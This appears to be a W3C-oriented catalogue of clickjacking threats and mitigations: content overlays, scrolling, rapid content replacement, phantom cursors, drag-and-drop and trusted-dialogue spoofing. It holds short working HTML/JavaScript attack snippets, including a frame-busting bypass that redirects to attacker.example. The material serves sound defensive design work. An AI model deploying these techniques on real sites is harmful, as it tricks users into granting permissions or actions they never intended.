Clickjacking Threats

Introduction

This page is intended to enumerate the known types of clickjacking attacks and possible mitigation strategies. Any W3C proposal for addressing clickjacking should consider each of these threats. The Possible solutions sections are currently just suggestions until they can be evaluated within the context of a formally proposed design; their main goal is to inspire ideas. Since clickjacking attacks depend on the end-user's comprehension of what they are viewing, and the browser only controls the border of the window, a proposed spec may also need to specify guidelines for how web content should best integrate with the anti-clickjacking solution. Some of the proposed solutions describe what may be required of developers to properly integrate with the anti-clickjacking window (such as leveraging the X-Frame-Options header with their trusted content).

Content overlays

Description: The most common form of clickjacking attack involves obscuring a trusted dialogue by overlaying malicious content. There are several variants of this attack.

Completely hidden: The original clickjacking attack involved loading the victim content into a 1x1 iframe, which prevents the end-user from being able to visually see the victim content. The attacker then centers the 1x1 iframe under the cursor so that the end-user will click on it. Since the end-user cannot tell that there is a 1x1 iframe under their mouse pointer, they can easily be tricked into clicking on the victim content.

Pointer events: In this attack, the attacker creates a floating div tag that completely covers the target trusted UI dialogue, but sets the CSS pointer-events property of that div to 'none'. As a result, clicks that occur over the untrusted overlay are ignored by the floating div tag and passed through to the content positioned underneath it. The target trusted UI is positioned underneath the malicious div tag, so it receives the click events.
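
A minimal sketch of this variant, using a placeholder victim URL and illustrative styling; the overlay is what the end-user sees, but its pointer-events setting lets every click fall through to the framed trusted UI:

    <!-- Trusted UI framed underneath; the URL is a placeholder. -->
    <iframe src="https://victim.example/confirm"
            style="position:absolute; top:0; left:0; width:400px; height:300px; border:0;"></iframe>

    <!-- Malicious overlay drawn on top. Because pointer-events is 'none',
         clicks pass straight through this div to the trusted UI below. -->
    <div style="position:absolute; top:0; left:0; width:400px; height:300px;
                z-index:10; background:#fff; pointer-events:none;">
      Click anywhere to claim your prize!
    </div>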

Cropping: In some cases, the attacker may only obscure part of the content through cropping. As an example, the attacker may leave the original 'allow' and 'cancel' buttons visible but overlay a new question on top of the original question. The end-user therefore believes that they are selecting between 'allow' and 'cancel' for the attacker's question. A slight variant of this attack may involve overlaying individual words in the trusted display rather than overlaying an entire section.

Transparent overlay: An attacker may try to make the trusted window transparent. The attacker will then overlay the trusted window on top of something that the user wants to click on. This causes the end-user to believe that they are clicking on the content that is positioned below the trusted window. In this case, the click would be registered by the transparent window since it is the top-most content at the time of the click.
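
A minimal sketch of the transparent-overlay variant, again with a placeholder URL; the trusted content is framed invisibly above the bait that the user intends to click:

    <!-- Bait content that the user wants to click. -->
    <button style="position:absolute; top:120px; left:120px;">Play video</button>

    <!-- Trusted/victim content framed on top of the bait and made fully
         transparent, so the click lands in the frame rather than the button. -->
    <iframe src="https://victim.example/confirm"
            style="position:absolute; top:60px; left:40px; width:400px; height:300px;
                   border:0; opacity:0; z-index:10;"></iframe>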


Possible solutions:

  • For web content, developers can set the X-Frame-Options header to prevent their content from being loaded in an attacker's iframe (see the example after this list)
  • The browser should ensure that the trusted content is the top-most element on the display list.
  • The browser can attempt to perform screen scraping. For this solution, the web browser writes the UI to the screen and then queries the OS to ensure that the pixels on the screen match what was sent to the drawing API.
  • The browser should grey out the top-most window, and not just the window of the iframe, when displaying an anti-clickjacking dialogue
  • The browser should not allow transparency to be applied when displaying the trusted window.
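
As a sketch of the first bullet, a site would send the X-Frame-Options response header with its trusted pages; DENY blocks all framing, while SAMEORIGIN allows framing only by pages from the same origin:

    HTTP/1.1 200 OK
    Content-Type: text/html
    X-Frame-Options: DENY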

Known concerns: For the screen scraping approach, this solution may cause issues if the HTML and JS are operating within a browser sandbox. Sandboxes try to block untrusted content from performing screen scraping.

Scrolling attacks

Description: An attacker may try to hide part of a trusted dialogue by scrolling the page until the majority of the dialogue no longer appears on the screen. As an example, let's say the web page asks the end-user a question within a trusted UI panel. At the bottom of the panel, there are two buttons which say "OK" and "Cancel". The attacker could scroll the page down until only the "OK" and "Cancel" buttons are left visible on the screen. Then the attacker poses a different question to the left of the "OK" and "Cancel" buttons. This makes the end-user believe that the buttons are in response to the question that is positioned to the left.
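
A rough sketch of this attack, with a placeholder URL and illustrative offsets; the attacker's page scrolls itself so that only the bottom strip of the framed trusted panel (its OK and Cancel buttons) remains in view next to the attacker's substitute question:

    <!-- Trusted panel embedded near the top of the attacker's page. -->
    <iframe src="https://victim.example/permission-panel"
            style="position:absolute; top:0; left:300px; width:220px; height:340px; border:0;"></iframe>

    <!-- Attacker's substitute question, placed beside where the panel's
         buttons will sit once the page has been scrolled. -->
    <div style="position:absolute; top:320px; left:20px;">Do you want to win a free phone?</div>

    <!-- Spacer so the page is tall enough to scroll. -->
    <div style="height:2000px;"></div>

    <script>
      // Scroll down so the panel's question is above the viewport and only
      // its buttons (near the bottom of the 340px-tall frame) stay visible.
      window.scrollTo(0, 300);
    </script>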

This is different from an overlay attack in that the trusted UI is still completely visible from the point of view of the web page. The browser is rendering the trusted UI as the top-most element of the page and no other web content is trying to overlay it. However, the trusted UI is still not completely in view for the end-user because the web page has been scrolled down until only a portion of the trusted UI is left in the browser window.


Possible solutions:

  • The browser should ensure that the trusted UI is centered on the page. The browser may choose to grey out the rest of the content so that only the dialogue is clearly visible.
  • The browser can attempt to perform screen scraping. For this solution, the web browser writes the UI to the screen and then queries the OS to ensure that the pixels on the screen match what was sent to the drawing API.

Known concerns: For the content centering approach, the end-user may still be unable to tell which piece of content on the page is asking the question. For instance, if a child iframe requests the anti-clickjacking window then the end-user may assume the question is being asked on behalf of the parent domain.

For the screen scraping approach, this solution may cause issues if the HTML and JS are operating within a browser sandbox. Sandboxes try to block untrusted content from performing screen scraping.

Rapid content replacement

Description: As a variant of the "Content overlay" attack, an attacker may try to obscure the content all the way up until the user is about to click. When the attacker believes the end-user is about to click, the attacker rapidly removes the content that is obscuring the victim dialogue. Once the end-user clicks on the victim dialogue, the attacker re-applies the content overlay to obscure the dialogue. This entire process could be measured in milliseconds. As one example, the attacker may ask the user to perform a double-click. The first click would remove the malicious overlay and the second click would be sent to the trusted dialogue underneath. The goal of this attack would be to bypass the screen scraping protections by ensuring the dialogue is visible when the user performs the click. However, the dialogue is only visible long enough to capture the click and then it is hidden again.
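
A rough sketch of the double-click variant, with placeholder names; the first press hides the decoy so that the second click of the double-click falls through to the framed trusted dialogue:

    <!-- Trusted dialogue framed underneath; the URL is a placeholder. -->
    <iframe src="https://victim.example/confirm"
            style="position:absolute; top:0; left:0; width:300px; height:150px; border:0;"></iframe>

    <!-- Decoy that covers the dialogue and invites a double-click. -->
    <div id="decoy" style="position:absolute; top:0; left:0; width:300px; height:150px;
                           z-index:10; background:#fff;">
      Double-click to continue
    </div>

    <script>
      var decoy = document.getElementById('decoy');
      // The first mousedown hides the decoy, so the second click of the
      // double-click lands on the trusted dialogue beneath it. The decoy is
      // restored a moment later to keep the dialogue obscured.
      decoy.addEventListener('mousedown', function () {
        decoy.style.display = 'none';
        setTimeout(function () { decoy.style.display = 'block'; }, 500);
      });
    </script>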


Possible solutions:

  • The browser should ensure that the dialogue is visible for a set period of time before recording the click. As an example, the dialogue must be visible for 3 seconds.
  • The browser should ensure that the dialogue is the top-most element on the display list.
  • The browser could ask for a secondary confirmation whose OK button is in a different position than the prior click.

Known concerns: The end-user may become frustrated during a legitimate use case when their first attempt at clicking is not recorded. A required second click may be equally frustrating. If the trusted UI window is small, the browser may not be able to place the secondary confirmation in a significantly different location.

Repositioning the trusted window

Description: An attacker may convince the end-user to rapidly click a button on the screen as part of a game. While the end-user is actively clicking on the button in the center of the screen, the attacker generates a trusted UI in the corner of the web page. As the user continues to click the button within the game, the attacker tries to rapidly slide the trusted UI under the user's mouse before the end-user can react. This results in the end-user unintentionally clicking on the trusted UI.
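
A rough sketch of this attack, with placeholder names; after a few clicks on the game button, the framed trusted dialogue is jumped under the spot where the user is already clicking:

    <!-- Game button the end-user is rapidly clicking. -->
    <button id="game" style="position:absolute; top:200px; left:200px;">Click as fast as you can!</button>

    <!-- Trusted dialogue framed in a far corner of the page; the URL is a placeholder. -->
    <iframe id="trusted" src="https://victim.example/confirm"
            style="position:absolute; top:600px; left:600px; width:200px; height:100px; border:0;"></iframe>

    <script>
      var clicks = 0;
      document.getElementById('game').addEventListener('click', function () {
        // After a few clicks, slide the dialogue so its button sits roughly
        // where the game button is, catching the user's next click.
        if (++clicks === 3) {
          var frame = document.getElementById('trusted');
          frame.style.top = '180px';
          frame.style.left = '170px';
        }
      });
    </script>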

This attack is different from rapid content replacement. With rapid content replacement, the UI is only visible for a short period of time. In this attack, the UI is always visible but its location on the page is changed in order to steal the click. Therefore, a protected UI must not only be visible for X number of seconds but its location must also be stationary for X number of seconds.


Possible solutions:

  • The dialogue must be present in a single position for a set period of time before clicks are registered. As an example, the dialogue should be stationary for 3 seconds.
  • Require a secondary confirmation that is placed in a different location than the last click.

Known concerns: The end-user may become frustrated during a legitimate use case if they have to click more than once due to the time delay. A secondary confirmation could be equally frustrating. If the trusted UI window is small, the browser may not be able to place the secondary confirmation in a significantly different location.

Phantom mouse cursors

Description: It is possible for a web page to have multiple mouse cursors. The real mouse cursor always exists. An attacker can simulate an additional mouse cursor using the proper image in a floating div tag. This additional mouse cursor will always be at a fixed offset from the real mouse cursor. Therefore, the end-user will see the fake cursor moving in response to their mouse movements. The attacker will also set up the page such that their fake mouse cursor is more visually prominent. An end-user will then assume that the fake mouse cursor is the legitimate mouse cursor. The attacker can take advantage of this by placing something that the end-user will want to click on in one corner of the screen and the trusted dialogue in the other corner of the screen. These two items are placed such that they are the same distance apart as the real mouse cursor and the fake mouse cursor. If the end-user is confused into using the fake mouse cursor and attempts to click on the attacker's content with the fake cursor, then the real mouse cursor will be positioned in the other corner of the screen where the click will be sent to the trusted dialogue.
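
A rough sketch of the fake-cursor technique, assuming a cursor image at a placeholder path; the fake cursor tracks the real one at a fixed horizontal offset, so clicks made "with" the fake cursor actually land wherever the real cursor happens to be:

    <!-- A visually prominent fake cursor drawn by the page. -->
    <img id="fakeCursor" src="fake-cursor.png"
         style="position:absolute; z-index:100; pointer-events:none;">

    <script>
      // Keep the fake cursor 300px to the left of the real cursor. When the
      // user lines the fake cursor up with the attacker's bait, the real
      // cursor is 300px to the right, over the trusted dialogue.
      document.addEventListener('mousemove', function (e) {
        var fake = document.getElementById('fakeCursor');
        fake.style.left = (e.pageX - 300) + 'px';
        fake.style.top = e.pageY + 'px';
      });
    </script>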

Even if the browser window greys out in time, it may take a second for the user to mentally register the change in focus. Therefore, they may click before they realize what has occurred.


Possible solutions:

  • The browser should grey out all content in the window including the floating fake cursor when presenting the anti-clickjacking dialogue.
  • The browser should halt all actions on the parent web page until the interaction with the anti-clickjacking window is complete.
  • The browser can ensure that the dialogue is visible for 3 seconds before registering a click.
  • The content hosted by the trusted UI can randomize parts of its layout, as sketched below. This inhibits the attacker's ability to correctly guess the location of the trusted buttons.
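
A rough sketch of this layout randomization, using illustrative element names for content hosted inside the trusted dialogue:

    <!-- Action buttons inside the trusted dialogue. -->
    <div id="actions">
      <button id="allow">Allow</button>
      <button id="cancel">Cancel</button>
    </div>

    <script>
      // Randomly swap the button order so an attacker cannot reliably
      // pre-position the page to aim a stolen click at "Allow".
      if (Math.random() < 0.5) {
        document.getElementById('actions')
                .appendChild(document.getElementById('allow'));
      }
    </script>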

Known concerns: The end-user may become frustrated during a legitimate use case if they have to click more than once due to the time delay.

Drag and drop attacks

Description: Rather than trying to get the end-user to perform a click, an attacker may try to trick the end-user into performing a drag operation. For instance, an attacker may try to overlay the right edge of the trusted dialogue with what appears to be a scroll bar. When the end-user tries to scroll down on the fake scroll bar, they are actually initiating a drag action. That drag action could result in selected content from the trusted dialogue being dropped in the untrusted parent page where the attacker can retrieve it. In theory, a good content overlay protection should stop this attack. However, as a defense-in-depth measure the browser could prevent drag actions within a trusted anti-clickjacking dialogue.


Possible solutions:

  • Ensure that the content overlay protection protects the entire window including the boundaries.
  • Do not allow content from inside the trusted window to be dragged into the calling page (see the sketch after this list).
  • Allow the developers to specify whether they want drag and drop protection in X-Frame-Options.
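
A small sketch of the drag protection from the second bullet, as it might be applied inside the trusted dialogue's content:

    <script>
      // Defense-in-depth inside the trusted dialogue: cancel drag and
      // text-selection gestures so its contents cannot be dragged out into
      // the untrusted parent page.
      document.addEventListener('dragstart', function (e) { e.preventDefault(); });
      document.addEventListener('selectstart', function (e) { e.preventDefault(); });
    </script>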

204 status codes / Malicious event handlers

Description: Many sites have deployed frame busting JavaScript code in order to prevent their content from being framed and overlaid. One known bypass of this protection is for the malicious parent page to register an onbeforeunload event handler. When the handler detects that the framed child is attempting to re-navigate the top window, the parent redirects that navigation to a page that is returned with a 204 No Content HTTP status code. When the browser receives the 204 status code, it abandons the re-navigation due to the lack of content. This leaves the malicious parent page loaded with the victim child iframe still in place.
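
For reference, a typical frame-busting script and a sketch of the published 204-flushing bypass; the no-content endpoint URL is a placeholder:

    <!-- Frame-busting code deployed by the framed (victim) page. -->
    <script>
      if (top !== self) {
        top.location = self.location;
      }
    </script>

    <!-- Sketch of the bypass, running in the malicious parent page. -->
    <script>
      var attempts = 0;
      window.onbeforeunload = function () { attempts++; };
      setInterval(function () {
        if (attempts > 0) {
          attempts = 0;
          // Redirect the pending navigation to a URL that answers with
          // 204 No Content; the browser abandons the navigation and the
          // parent page, with the framed victim, stays loaded.
          top.location = 'https://attacker.example/no-content';
        }
      }, 1);
    </script>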

For a clickjacking design that is initiated from JavaScript, an attacker is likely to have a handle to the anti-clickjacking window where they can listen for events or try to affect properties of the window. If the design allows the attacker to manipulate the window, then they may be able to alter its behavior. As an example, they may be able to alter the text of the dialogue that is being displayed.

Possible solutions:

  • The handle for the anti-clickjacking window should not expose any properties and the attacker should receive only a minimal set of events from the window.

Trusted dialogue extensions

Description: The trusted dialogue is likely to be a rectangular shape. Rather than overlay or obscure the content from view, an attacker may try to place an additional piece of malicious content to the right or bottom of the dialogue. The malicious content would have the same style as the trusted UI design. This will allow the malicious content to appear to be a seamless extension of the trusted dialogue. This could lead the end-user to believe that there is just one dialogue prompt on the screen. Depending on the malicious content, the attacker may be able to trick the end-user into misunderstanding the question being presented.

This is slightly different from the scrolling attack. In this scenario, the full UI is visible to the end-user at all times. In this case, the goal is to make the attacker's additions to the UI indistinguishable from the UI itself. This can allow the attacker to add additional text that may confuse the end-user.


Possible solutions:

  • All content that does not relate to the dialogue must be greyed out so that the dialogue is clearly distinguishable from untrusted content.
  • The browser could implement the anti-clickjacking dialogue to be a native dialogue rather than an extension of web content.

Known concerns: Native dialogues may convey more trust than the web browser intends. While the anti-clickjacking dialogue should be clearly differentiated from all other content, it should not convey an additional level of trust. See 'Trusted user interfaces'.

Trusted user interfaces

Description: For Flash Player settings dialogues, the runtime uses primarily static text. The only per-site information that is displayed is the domain name that is requesting the permission. This ensures that the attacker cannot manipulate the question that is being presented to the end-user. A consistent UI experience can establish a sense of trust and is easier to describe to end-users.

Conversely, if the anti-clickjacking proposal intends to let sites define their own dialogues, then the web browser needs to be careful that the browser's anti-clickjacking UI does not appear to convey a false sense of trust. The UI should not lead the user to believe that the dialogue is more trustworthy than is intended. As an example, the trusted UI should not lead the user to believe it is the equivalent of an SSL connection if the parent content is served over HTTP.


Possible solutions:

  • The anti-clickjacking window should not convey any security related information such as a lock icon. The design should not require the end-user to know that this dialogue is special in any way.
  • The information that is presented in the dialogue should be loaded separately from the rest of the page. This will limit the effect an XSS attack may have on the information that is displayed in the trusted dialogue. As an example, the API for a new anti-clickjacking window can take a URL as an argument rather than a string of HTML content (a hypothetical sketch follows this list).
  • The browser should not allow anti-clickjacking protections in mixed-content scenarios. If the parent page is HTTP and the anti-clickjacking content comes from HTTPS, then the change in the UI may lead an end-user to believe that it is a secured connection. Developers may also misunderstand the protections of the anti-clickjacking dialogue and use it for one-click buys on insecure web pages. Ensuring that the location bar is HTTPS for trusted UI that is loaded over HTTPS could avoid these problems. This assumes that the anti-clickjacking API takes a URL as an argument rather than a string.
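
A purely hypothetical sketch of the URL-based API described in the second bullet; openAntiClickjackingDialog does not exist in any browser and is only illustrative:

    <script>
      // Hypothetical API: the browser loads and renders the trusted content
      // from the given URL itself, so the calling page never supplies the
      // dialogue's markup as a string.
      window.openAntiClickjackingDialog('https://bank.example/confirm-transfer',
        function (result) {
          // 'result' would indicate whether the user confirmed or cancelled.
        });
    </script>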

Known concerns: The browser will be unable to prevent the web site from providing a false sense of trust.

Authors

Peleus Uhley, Adobe Systems, Inc. with thanks to David Lin-Shung Huang from Carnegie Mellon University.